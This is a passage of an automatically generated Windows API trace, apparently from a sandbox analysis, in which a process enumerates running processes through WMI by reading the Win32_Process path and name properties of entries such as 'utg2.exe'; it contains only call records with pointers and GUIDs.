pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.812] IWbemClassObject:Get (in: This=0x742570, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2860\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.812] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2860\"") returned 0x66 [0225.812] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2860\"") returned 0x66 [0225.812] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.812] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.812] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.813] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.813] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5ed1b38) returned 0x0 [0225.814] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed1b38, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.814] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5ed1b38, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ed1028) returned 0x0 [0225.814] WbemDefPath:IUnknown:Release (This=0x5ed1b38) returned 0x0 [0225.814] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed1028, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ed1028) returned 0x0 [0225.814] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed1028, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.814] WbemDefPath:IUnknown:AddRef (This=0x5ed1028) returned 0x3 [0225.814] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed1028, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.814] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed1028, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.814] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed1028, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ed1b48) returned 0x0 [0225.814] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ed1b48, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.814] WbemDefPath:IUnknown:Release (This=0x5ed1b48) returned 0x3 [0225.814] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.814] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.814] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed1028, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.814] WbemDefPath:IUnknown:Release (This=0x5ed1028) returned 0x2 [0225.814] WbemDefPath:IUnknown:Release (This=0x5ed1028) returned 0x1 [0225.815] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.815] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.815] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed1028, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ed1028) returned 0x0 [0225.815] WbemDefPath:IUnknown:AddRef (This=0x5ed1028) returned 0x3 [0225.815] WbemDefPath:IUnknown:Release (This=0x5ed1028) returned 0x2 [0225.815] WbemDefPath:IWbemPath:SetText (This=0x5ed1028, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2860\"") returned 0x0 [0225.815] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.815] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.815] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.815] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.815] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.815] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.815] IWbemClassObject:Get (in: This=0x742570, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2574d50*=0, plFlavor=0x2574d54*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="utg2.exe", varVal2=0x0), pType=0x2574d50*=8, plFlavor=0x2574d54*=0) returned 0x0 [0225.815] SysStringByteLen (bstr="utg2.exe") returned 0x10 [0225.815] SysStringByteLen (bstr="utg2.exe") returned 0x10 [0225.815] IWbemClassObject:Get (in: This=0x742570, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2574d50*=8, plFlavor=0x2574d54*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="utg2.exe", varVal2=0x0), pType=0x2574d50*=8, plFlavor=0x2574d54*=0) returned 0x0 [0225.815] SysStringByteLen (bstr="utg2.exe") returned 0x10 [0225.815] SysStringByteLen (bstr="utg2.exe") returned 0x10 [0225.815] CoTaskMemAlloc (cb=0x4) returned 0x5ed1b78 [0225.816] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ed1b78, puReturned=0x2569c44 | out: apObjects=0x5ed1b78*=0x742708, puReturned=0x2569c44*=0x1) returned 0x0 [0225.816] IUnknown:QueryInterface (in: This=0x742708, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x742708) returned 0x0 [0225.817] IUnknown:QueryInterface (in: This=0x742708, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.817] IUnknown:QueryInterface (in: This=0x742708, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.817] IUnknown:AddRef (This=0x742708) returned 0x3 [0225.817] IUnknown:QueryInterface (in: This=0x742708, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.817] IUnknown:QueryInterface (in: This=0x742708, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.817] IUnknown:QueryInterface (in: This=0x742708, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x74270c) returned 0x0 [0225.817] IMarshal:GetUnmarshalClass (in: This=0x74270c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.817] IUnknown:Release (This=0x74270c) returned 0x3 [0225.817] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.817] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.817] IUnknown:QueryInterface (in: This=0x742708, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.817] IUnknown:Release (This=0x742708) returned 0x2 [0225.817] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.817] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.817] IUnknown:QueryInterface (in: This=0x742708, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x742708) returned 0x0 [0225.817] IUnknown:AddRef (This=0x742708) returned 0x4 [0225.817] IUnknown:Release (This=0x742708) returned 0x3 [0225.817] IUnknown:Release (This=0x742708) returned 0x2 [0225.818] CoTaskMemFree (pv=0x5ed1b78) [0225.818] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.818] IUnknown:AddRef (This=0x742708) returned 0x3 [0225.818] IWbemClassObject:Get (in: This=0x742708, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.818] IWbemClassObject:Get (in: This=0x742708, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2868\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.818] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2868\"") returned 0x66 [0225.818] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2868\"") returned 0x66 [0225.818] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.818] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.819] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.819] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.819] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5ed1b78) returned 0x0 [0225.820] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed1b78, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.820] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5ed1b78, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ed1108) returned 0x0 [0225.820] WbemDefPath:IUnknown:Release (This=0x5ed1b78) returned 0x0 [0225.820] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed1108, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ed1108) returned 0x0 [0225.820] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed1108, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.820] WbemDefPath:IUnknown:AddRef (This=0x5ed1108) returned 0x3 [0225.820] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed1108, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.820] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed1108, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.820] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed1108, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ed1b88) returned 0x0 [0225.820] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ed1b88, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.820] WbemDefPath:IUnknown:Release (This=0x5ed1b88) returned 0x3 [0225.820] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.820] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.820] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed1108, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.821] WbemDefPath:IUnknown:Release (This=0x5ed1108) returned 0x2 [0225.821] WbemDefPath:IUnknown:Release (This=0x5ed1108) returned 0x1 [0225.821] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.821] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.821] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed1108, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ed1108) returned 0x0 [0225.821] WbemDefPath:IUnknown:AddRef (This=0x5ed1108) returned 0x3 [0225.821] WbemDefPath:IUnknown:Release (This=0x5ed1108) returned 0x2 [0225.821] WbemDefPath:IWbemPath:SetText (This=0x5ed1108, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2868\"") returned 0x0 [0225.821] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.821] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.821] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.821] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.821] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.821] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.821] IWbemClassObject:Get (in: This=0x742708, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x25755b4*=0, plFlavor=0x25755b8*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="through recognize.exe", varVal2=0x0), pType=0x25755b4*=8, plFlavor=0x25755b8*=0) returned 0x0 [0225.821] SysStringByteLen (bstr="through recognize.exe") returned 0x2a [0225.821] SysStringByteLen (bstr="through recognize.exe") returned 0x2a [0225.821] IWbemClassObject:Get (in: This=0x742708, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x25755b4*=8, plFlavor=0x25755b8*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="through recognize.exe", varVal2=0x0), pType=0x25755b4*=8, plFlavor=0x25755b8*=0) returned 0x0 [0225.821] SysStringByteLen (bstr="through recognize.exe") returned 0x2a [0225.821] SysStringByteLen (bstr="through recognize.exe") returned 0x2a [0225.822] CoTaskMemAlloc (cb=0x4) returned 0x5ed1bb8 [0225.822] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ed1bb8, puReturned=0x2569c44 | out: apObjects=0x5ed1bb8*=0x7428a0, puReturned=0x2569c44*=0x1) returned 0x0 [0225.822] IUnknown:QueryInterface (in: This=0x7428a0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x7428a0) returned 0x0 [0225.823] IUnknown:QueryInterface (in: This=0x7428a0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.823] IUnknown:QueryInterface (in: This=0x7428a0, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.823] IUnknown:AddRef (This=0x7428a0) returned 0x3 [0225.823] IUnknown:QueryInterface (in: This=0x7428a0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.823] IUnknown:QueryInterface (in: This=0x7428a0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.823] IUnknown:QueryInterface (in: This=0x7428a0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x7428a4) returned 0x0 [0225.823] IMarshal:GetUnmarshalClass (in: This=0x7428a4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.823] IUnknown:Release (This=0x7428a4) returned 0x3 [0225.823] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.823] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.823] IUnknown:QueryInterface (in: This=0x7428a0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 